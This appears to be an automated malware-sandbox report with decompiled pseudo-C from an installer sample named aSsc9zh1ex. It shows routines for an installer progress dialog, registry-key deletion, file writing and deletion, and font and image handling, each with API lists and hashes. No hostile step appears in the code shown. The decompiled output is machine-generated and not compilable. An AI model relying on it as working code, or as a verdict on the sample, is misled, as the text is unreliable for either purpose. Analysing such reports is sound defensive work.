                        • String ID: Nv@hv
                        • API String ID: 1148316912-4226514844
                        • Opcode ID: fe4ee7051e3578ffed058cb2cb0eb728dda0b8f91cda2be53ed91db8803a7ea4
                        • Instruction ID: 549e7d9b81cbb398c300fa668a0053b1d16741fbdc769662e77c99739b5cf0d9
                        • Opcode Fuzzy Hash: fe4ee7051e3578ffed058cb2cb0eb728dda0b8f91cda2be53ed91db8803a7ea4
                        • Instruction Fuzzy Hash: 2CF012735161387BD62026A79C4CD9B7E9CDF8B2F6B214251F61CD119089615C11D7F1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                        				short _v132;
                        				int _t11;
                        				int _t20;
                        
                        				if(_a8 == 0x110) {
                        					SetTimer(_a4, 1, 0xfa, 0);
                        					_a8 = 0x113;
                        				}
                        				if(_a8 == 0x113) {
                        					_t20 =  *0x7936f8; // 0x4fcbb
                        					_t11 =  *0x79f704; // 0x4fcbf
                        					if(_t20 >= _t11) {
                        						_t20 = _t11;
                        					}
                        					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                        					SetWindowTextW(_a4,  &_v132);
                        					SetDlgItemTextW(_a4, 0x406,  &_v132);
                        				}
                        				return 0;
                        			}







                        APIs
                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                        • MulDiv.KERNEL32(0004FCBB,00000064,0004FCBF), ref: 00402FDC
                        • wsprintfW.USER32 ref: 00402FEC
                        • SetWindowTextW.USER32(?,?), ref: 00402FFC
                        • SetDlgItemTextW.USER32 ref: 0040300E
                        Strings
                        • verifying installer: %d%%, xrefs: 00402FE6
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: Text$ItemTimerWindowwsprintf
                        • String ID: verifying installer: %d%%
                        • API String ID: 1451636040-82062127
                        • Opcode ID: d023595f9e9ef59bdd75dda31b52a3c2e885d3e2bc42a898f2d7cd706f4c6b2f
                        • Instruction ID: 93fc8baa8d380bd3002b945ae1bdcf8604075b20dc3457daa0419b6feabf18a2
                        • Opcode Fuzzy Hash: d023595f9e9ef59bdd75dda31b52a3c2e885d3e2bc42a898f2d7cd706f4c6b2f
                        • Instruction Fuzzy Hash: EC014F7064020DBBEF209F60DE4ABEA3B79EB00345F108039FA06B51D0DBB99A559B58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 75%
                        			E732D2655() {
                        				intOrPtr _t24;
                        				void* _t26;
                        				intOrPtr _t27;
                        				signed int _t39;
                        				void* _t40;
                        				void* _t43;
                        				intOrPtr _t44;
                        				void* _t45;
                        
                        				_t40 = E732D12BB();
                        				_t24 =  *((intOrPtr*)(_t45 + 0x18));
                        				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
                        				_t43 = (_t44 + 0x81 << 5) + _t24;
                        				do {
                        					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
                        					}
                        					_t39 =  *(_t43 - 8) & 0x000000ff;
                        					if(_t39 <= 7) {
                        						switch( *((intOrPtr*)(_t39 * 4 +  &M732D2784))) {
                        							case 0:
                        								 *_t40 = 0;
                        								goto L17;
                        							case 1:
                        								__eax =  *__eax;
                        								if(__ecx > __ebx) {
                        									 *(__esp + 0x10) = __ecx;
                        									__ecx =  *(0x732d407c + __edx * 4);
                        									__edx =  *(__esp + 0x10);
                        									__ecx = __ecx * __edx;
                        									asm("sbb edx, edx");
                        									__edx = __edx & __ecx;
                        									__eax = __eax &  *(0x732d409c + __edx * 4);
                        								}
                        								_push(__eax);
                        								goto L15;
                        							case 2:
                        								__eax = E732D1510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                        								goto L16;
                        							case 3:
                        								__ecx =  *0x732d506c;
                        								__edx = __ecx - 1;
                        								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
                        								__eax =  *0x732d506c;
                        								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
                        								goto L17;
                        							case 4:
                        								__eax = lstrcpynW(__edi,  *__eax,  *0x732d506c);
                        								goto L17;
                        							case 5:
                        								_push( *0x732d506c);
                        								_push(__edi);
                        								_push( *__eax);
                        								__imp__StringFromGUID2();
                        								goto L17;
                        							case 6:
                        								_push( *__esi);
                        								L15:
                        								__eax = wsprintfW(__edi, 0x732d5000);
                        								L16:
                        								__esp = __esp + 0xc;
                        								goto L17;
                        						}
                        					}
                        					L17:
                        					_t26 =  *(_t43 + 0x14);
                        					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                        						GlobalFree(_t26);
                        					}
                        					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                        					if(_t27 != 0) {
                        						if(_t27 != 0xffffffff) {
                        							if(_t27 > 0) {
                        								E732D1381(_t27 - 1, _t40);
                        								goto L26;
                        							}
                        						} else {
                        							E732D1312(_t40);
                        							L26:
                        						}
                        					}
                        					_t44 = _t44 - 1;
                        					_t43 = _t43 - 0x20;
                        				} while (_t44 >= 0);
                        				return GlobalFree(_t40);
                        			}












                        APIs
                          • Part of subcall function 732D12BB: GlobalAlloc.KERNELBASE(00000040,?,732D12DB,?,732D137F,00000019,732D11CA,-000000A0), ref: 732D12C5
                        • GlobalFree.KERNEL32 ref: 732D2743
                        • GlobalFree.KERNEL32 ref: 732D2778
                        Memory Dump Source
                        • Source File: 00000001.00000002.886480223.00000000732D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 732D0000, based on PE: true
                        • Associated: 00000001.00000002.886476119.00000000732D0000.00000002.00000001.01000000.00000006.sdmp
                        • Associated: 00000001.00000002.886488080.00000000732D4000.00000002.00000001.01000000.00000006.sdmp
                        • Associated: 00000001.00000002.886506522.00000000732D6000.00000002.00000001.01000000.00000006.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_732d0000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: Global$Free$Alloc
                        • String ID:
                        • API String ID: 1780285237-0
                        • Opcode ID: 448964dd1662868ec9ed14a2b87de4e8af0c924959588158d38daf0285d9a029
                        • Instruction ID: ada68dd481daef3d3ba4d1849be8259cb75307ac4c52d958698e5aa718b410bb
                        • Opcode Fuzzy Hash: 448964dd1662868ec9ed14a2b87de4e8af0c924959588158d38daf0285d9a029
                        • Instruction Fuzzy Hash: DF313772A3431ADFE7269F61D8C8F2A77BAFF85302324816CF10583550C7756891EB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E00402950(int __ebx, void* __eflags) {
                        				WCHAR* _t26;
                        				void* _t29;
                        				long _t37;
                        				int _t49;
                        				void* _t52;
                        				void* _t54;
                        				void* _t56;
                        				void* _t59;
                        				void* _t60;
                        				void* _t61;
                        
                        				_t49 = __ebx;
                        				_t52 = 0xfffffd66;
                        				_t26 = E00402DA6(0xfffffff0);
                        				_t55 = _t26;
                        				 *(_t61 - 0x40) = _t26;
                        				if(E00405E60(_t26) == 0) {
                        					E00402DA6(0xffffffed);
                        				}
                        				E00405FE5(_t55);
                        				_t29 = E0040600A(_t55, 0x40000000, 2);
                        				 *(_t61 + 8) = _t29;
                        				if(_t29 != 0xffffffff) {
                        					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                        					if( *(_t61 - 0x28) != _t49) {
                        						_t37 =  *0x7a8a74;
                        						 *(_t61 - 0x44) = _t37;
                        						_t54 = GlobalAlloc(0x40, _t37);
                        						if(_t54 != _t49) {
                        							E004034C2(_t49);
                        							E004034AC(_t54,  *(_t61 - 0x44));
                        							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                        							 *(_t61 - 0x10) = _t59;
                        							if(_t59 != _t49) {
                        								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                        								while( *_t59 != _t49) {
                        									_t60 = _t59 + 8;
                        									 *(_t61 - 0x3c) =  *_t59;
                        									E00405FC5( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                        									_t59 = _t60 +  *(_t61 - 0x3c);
                        								}
                        								GlobalFree( *(_t61 - 0x10));
                        							}
                        							E004060BC( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                        							GlobalFree(_t54);
                        							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                        						}
                        					}
                        					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                        					CloseHandle( *(_t61 + 8));
                        				}
                        				_t56 = 0xfffffff3;
                        				if(_t52 < _t49) {
                        					_t56 = 0xffffffef;
                        					DeleteFileW( *(_t61 - 0x40));
                        					 *((intOrPtr*)(_t61 - 4)) = 1;
                        				}
                        				_push(_t56);
                        				E00401423();
                        				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t61 - 4));
                        				return 0;
                        			}














                        APIs
                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                        • GlobalFree.KERNEL32 ref: 00402A06
                        • GlobalFree.KERNEL32 ref: 00402A19
                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                        • String ID:
                        • API String ID: 2667972263-0
                        • Opcode ID: 7cb88154959430789f3c0562538d20fa3cf9f322f701f7308e619775f0ab440c
                        • Instruction ID: ce13e03cd45963b48540e15e7c975c75beca6294bacda27d7b2280c3fc44a057
                        • Opcode Fuzzy Hash: 7cb88154959430789f3c0562538d20fa3cf9f322f701f7308e619775f0ab440c
                        • Instruction Fuzzy Hash: CA31B171D00124BBCF216FA5CE89D9EBE79EF49364F14423AF450762E1CB794C429B98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 97%
                        			E732D1979(signed int __edx, void* __eflags, void* _a8, void* _a16) {
                        				void* _v8;
                        				signed int _v12;
                        				signed int _v20;
                        				signed int _v24;
                        				char _v76;
                        				void _t45;
                        				signed int _t46;
                        				signed int _t47;
                        				signed int _t48;
                        				signed int _t57;
                        				signed int _t58;
                        				signed int _t59;
                        				signed int _t60;
                        				signed int _t61;
                        				void* _t67;
                        				void* _t68;
                        				void* _t69;
                        				void* _t70;
                        				void* _t71;
                        				signed int _t77;
                        				void* _t81;
                        				signed int _t83;
                        				signed int _t85;
                        				signed int _t87;
                        				signed int _t90;
                        				void* _t101;
                        
                        				_t85 = __edx;
                        				 *0x732d506c = _a8;
                        				_t77 = 0;
                        				 *0x732d5070 = _a16;
                        				_v12 = 0;
                        				_v8 = E732D12E3();
                        				_t90 = E732D13B1(_t42);
                        				_t87 = _t85;
                        				_t81 = E732D12E3();
                        				_a8 = _t81;
                        				_t45 =  *_t81;
                        				if(_t45 != 0x7e && _t45 != 0x21) {
                        					_a16 = E732D12E3();
                        					_t77 = E732D13B1(_t74);
                        					_v12 = _t85;
                        					GlobalFree(_a16);
                        					_t81 = _a8;
                        				}
                        				_t46 =  *_t81 & 0x0000ffff;
                        				_t101 = _t46 - 0x2f;
                        				if(_t101 > 0) {
                        					_t47 = _t46 - 0x3c;
                        					__eflags = _t47;
                        					if(_t47 == 0) {
                        						__eflags =  *((short*)(_t81 + 2)) - 0x3c;
                        						if( *((short*)(_t81 + 2)) != 0x3c) {
                        							__eflags = _t87 - _v12;
                        							if(__eflags > 0) {
                        								L56:
                        								_t48 = 0;
                        								__eflags = 0;
                        								L57:
                        								asm("cdq");
                        								L58:
                        								_t90 = _t48;
                        								_t87 = _t85;
                        								L59:
                        								E732D1510(_t85, _t90, _t87,  &_v76);
                        								E732D1312( &_v76);
                        								GlobalFree(_v8);
                        								return GlobalFree(_a8);
                        							}
                        							if(__eflags < 0) {
                        								L49:
                        								__eflags = 0;
                        								L50:
                        								_t48 = 1;
                        								goto L57;
                        							}
                        							__eflags = _t90 - _t77;
                        							if(_t90 < _t77) {
                        								goto L49;
                        							}
                        							goto L56;
                        						}
                        						_t85 = _t87;
                        						_t48 = E732D3050(_t90, _t77, _t85);
                        						goto L58;
                        					}
                        					_t57 = _t47 - 1;
                        					__eflags = _t57;
                        					if(_t57 == 0) {
                        						__eflags = _t90 - _t77;
                        						if(_t90 != _t77) {
                        							goto L56;
                        						}
                        						__eflags = _t87 - _v12;
                        						if(_t87 != _v12) {
                        							goto L56;
                        						}
                        						goto L49;
                        					}
                        					_t58 = _t57 - 1;
                        					__eflags = _t58;
                        					if(_t58 == 0) {
                        						__eflags =  *((short*)(_t81 + 2)) - 0x3e;
                        						if( *((short*)(_t81 + 2)) != 0x3e) {
                        							__eflags = _t87 - _v12;
                        							if(__eflags < 0) {
                        								goto L56;
                        							}
                        							if(__eflags > 0) {
                        								goto L49;
                        							}
                        							__eflags = _t90 - _t77;
                        							if(_t90 <= _t77) {
                        								goto L56;
                        							}
                        							goto L49;
                        						}
                        						__eflags =  *((short*)(_t81 + 4)) - 0x3e;
                        						_t85 = _t87;
                        						_t59 = _t90;
                        						_t83 = _t77;
                        						if( *((short*)(_t81 + 4)) != 0x3e) {
                        							_t48 = E732D3070(_t59, _t83, _t85);
                        						} else {
                        							_t48 = E732D30A0(_t59, _t83, _t85);
                        						}
                        						goto L58;
                        					}
                        					_t60 = _t58 - 0x20;
                        					__eflags = _t60;
                        					if(_t60 == 0) {
                        						_t90 = _t90 ^ _t77;
                        						_t87 = _t87 ^ _v12;
                        						goto L59;
                        					}
                        					_t61 = _t60 - 0x1e;
                        					__eflags = _t61;
                        					if(_t61 == 0) {
                        						__eflags =  *((short*)(_t81 + 2)) - 0x7c;
                        						if( *((short*)(_t81 + 2)) != 0x7c) {
                        							_t90 = _t90 | _t77;
                        							_t87 = _t87 | _v12;
                        							goto L59;
                        						}
                        						__eflags = _t90 | _t87;
                        						if((_t90 | _t87) != 0) {
                        							goto L49;
                        						}
                        						__eflags = _t77 | _v12;
                        						if((_t77 | _v12) != 0) {
                        							goto L49;
                        						}
                        						goto L56;
                        					}
                        					__eflags = _t61 == 0;
                        					if(_t61 == 0) {
                        						_t90 =  !_t90;
                        						_t87 =  !_t87;
                        					}
                        					goto L59;
                        				}
                        				if(_t101 == 0) {
                        					L21:
                        					__eflags = _t77 | _v12;
                        					if((_t77 | _v12) != 0) {
                        						_v24 = E732D2EE0(_t90, _t87, _t77, _v12);
                        						_v20 = _t85;
                        						_t48 = E732D2F90(_t90, _t87, _t77, _v12);
                        						_t81 = _a8;
                        					} else {
                        						_v24 = _v24 & 0x00000000;
                        						_v20 = _v20 & 0x00000000;
                        						_t48 = _t90;
                        						_t85 = _t87;
                        					}
                        					__eflags =  *_t81 - 0x2f;
                        					if( *_t81 != 0x2f) {
                        						goto L58;
                        					} else {
                        						_t90 = _v24;
                        						_t87 = _v20;
                        						goto L59;
                        					}
                        				}
                        				_t67 = _t46 - 0x21;
                        				if(_t67 == 0) {
                        					_t48 = 0;
                        					__eflags = _t90 | _t87;
                        					if((_t90 | _t87) != 0) {
                        						goto L57;
                        					}
                        					goto L50;
                        				}
                        				_t68 = _t67 - 4;
                        				if(_t68 == 0) {
                        					goto L21;
                        				}
                        				_t69 = _t68 - 1;
                        				if(_t69 == 0) {
                        					__eflags =  *((short*)(_t81 + 2)) - 0x26;
                        					if( *((short*)(_t81 + 2)) != 0x26) {
                        						_t90 = _t90 & _t77;
                        						_t87 = _t87 & _v12;
                        						goto L59;
                        					}
                        					__eflags = _t90 | _t87;
                        					if((_t90 | _t87) == 0) {
                        						goto L56;
                        					}
                        					__eflags = _t77 | _v12;
                        					if((_t77 | _v12) == 0) {
                        						goto L56;
                        					}
                        					goto L49;
                        				}
                        				_t70 = _t69 - 4;
                        				if(_t70 == 0) {
                        					_t48 = E732D2EA0(_t90, _t87, _t77, _v12);
                        					goto L58;
                        				} else {
                        					_t71 = _t70 - 1;
                        					if(_t71 == 0) {
                        						_t90 = _t90 + _t77;
                        						asm("adc edi, [ebp-0x8]");
                        					} else {
                        						if(_t71 == 0) {
                        							_t90 = _t90 - _t77;
                        							asm("sbb edi, [ebp-0x8]");
                        						}
                        					}
                        					goto L59;
                        				}
                        			}






























                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.886480223.00000000732D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 732D0000, based on PE: true
                        • Associated: 00000001.00000002.886476119.00000000732D0000.00000002.00000001.01000000.00000006.sdmp
                        • Associated: 00000001.00000002.886488080.00000000732D4000.00000002.00000001.01000000.00000006.sdmp
                        • Associated: 00000001.00000002.886506522.00000000732D6000.00000002.00000001.01000000.00000006.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_732d0000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: FreeGlobal
                        • String ID:
                        • API String ID: 2979337801-0
                        • Opcode ID: 5cb183d8026310c9f8b8b30e253383eaf2d3f1850c92e211cffcf0f1883fd4b8
                        • Instruction ID: dc9c0d98887c959fc1198bf4db542519249d5b4a3ffd10012d3ad38c1f54f0f9
                        • Opcode Fuzzy Hash: 5cb183d8026310c9f8b8b30e253383eaf2d3f1850c92e211cffcf0f1883fd4b8
                        • Instruction Fuzzy Hash: 40510932F3011AABEB869FB4C44479D7BBAEB44300F148159D406B3E94F6B5BAC5C791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 48%
                        			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                        				void* _v8;
                        				int _v12;
                        				short _v536;
                        				void* _t27;
                        				signed int _t33;
                        				intOrPtr* _t35;
                        				signed int _t45;
                        				signed int _t46;
                        				signed int _t47;
                        
                        				_t46 = _a12;
                        				_t47 = _t46 & 0x00000300;
                        				_t45 = _t46 & 0x00000001;
                        				_t27 = E00406387(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                        				if(_t27 == 0) {
                        					if((_a12 & 0x00000002) == 0) {
                        						L3:
                        						_push(0x105);
                        						_push( &_v536);
                        						_push(0);
                        						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                        							__eflags = _t45;
                        							if(__eflags != 0) {
                        								L10:
                        								RegCloseKey(_v8);
                        								return 0x3eb;
                        							}
                        							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                        							__eflags = _t33;
                        							if(_t33 != 0) {
                        								break;
                        							}
                        							_push(0x105);
                        							_push( &_v536);
                        							_push(_t45);
                        						}
                        						RegCloseKey(_v8);
                        						_t35 = E004068E7(3);
                        						if(_t35 != 0) {
                        							return  *_t35(_a4, _a8, _t47, 0);
                        						}
                        						return RegDeleteKeyW(_a4, _a8);
                        					}
                        					_v12 = 0;
                        					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                        						goto L10;
                        					}
                        					goto L3;
                        				}
                        				return _t27;
                        			}













                        APIs
                        • RegEnumValueW.ADVAPI32 ref: 00402EFD
                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: CloseEnum$DeleteValue
                        • String ID:
                        • API String ID: 1354259210-0
                        • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                        • Instruction ID: c11aca49d0effc85046ccc9aadc56b913b01f210672418aaa5aa9f4d8e4c938e
                        • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                        • Instruction Fuzzy Hash: 8C212A7150010ABBDF11AF90CE89EEF7B7DEB54384F110076F909B21A0D7B59E54AA68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E00401D81(void* __ebx, void* __edx) {
                        				struct HWND__* _t30;
                        				WCHAR* _t38;
                        				void* _t48;
                        				void* _t53;
                        				signed int _t55;
                        				signed int _t60;
                        				long _t63;
                        				void* _t65;
                        
                        				_t53 = __ebx;
                        				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                        					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                        				} else {
                        					E00402D84(2);
                        					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                        				}
                        				_t55 =  *(_t65 - 0x24);
                        				 *(_t65 + 8) = _t30;
                        				_t60 = _t55 & 0x00000004;
                        				 *(_t65 - 0x38) = _t55 & 0x00000003;
                        				 *(_t65 - 0x18) = _t55 >> 0x1f;
                        				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                        				if((_t55 & 0x00010000) == 0) {
                        					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                        				} else {
                        					_t38 = E00402DA6(0x11);
                        				}
                        				 *(_t65 - 0x44) = _t38;
                        				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                        				asm("sbb esi, esi");
                        				_t63 = LoadImageW( ~_t60 &  *0x7a8a60,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                        				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                        				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                        					DeleteObject(_t48);
                        				}
                        				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                        					_push(_t63);
                        					E00406461();
                        				}
                        				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t65 - 4));
                        				return 0;
                        			}












                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                        • String ID:
                        • API String ID: 1849352358-0
                        • Opcode ID: a6aad87a710fcdef47f5999398108e389655c35983e9ac7c8f9262d328879ae0
                        • Instruction ID: 28669104e63112c2688ec1bf4ccd66a2dfd92d91aff3cd1988410ea650e2814b
                        • Opcode Fuzzy Hash: a6aad87a710fcdef47f5999398108e389655c35983e9ac7c8f9262d328879ae0
                        • Instruction Fuzzy Hash: 1721F672D04119AFCB05DBA4DE45AEEBBB5EF08304F14403AF945F62A0DB389951DB98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 73%
                        			E00401E4E(intOrPtr __edx) {
                        				void* __edi;
                        				int _t9;
                        				signed char _t15;
                        				struct HFONT__* _t18;
                        				intOrPtr _t30;
                        				void* _t31;
                        				struct HDC__* _t33;
                        				void* _t35;
                        
                        				_t30 = __edx;
                        				_t33 = GetDC( *(_t35 - 8));
                        				_t9 = E00402D84(2);
                        				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                        				0x40cdc8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                        				ReleaseDC( *(_t35 - 8), _t33);
                        				 *0x40cdd8 = E00402D84(3);
                        				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                        				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                        				 *0x40cddf = 1;
                        				 *0x40cddc = _t15 & 0x00000001;
                        				 *0x40cddd = _t15 & 0x00000002;
                        				 *0x40cdde = _t15 & 0x00000004;
                        				E00406557(_t9, _t31, _t33, 0x40cde4,  *((intOrPtr*)(_t35 - 0x2c)));
                        				_t18 = CreateFontIndirectW(0x40cdc8);
                        				_push(_t18);
                        				_push(_t31);
                        				E00406461();
                        				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t35 - 4));
                        				return 0;
                        			}












                        APIs
                        • GetDC.USER32(?), ref: 00401E51
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                        • ReleaseDC.USER32 ref: 00401E84
                          • Part of subcall function 00406557: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066FC
                          • Part of subcall function 00406557: lstrlenW.KERNEL32(Call,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756
                        • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                        Memory Dump Source
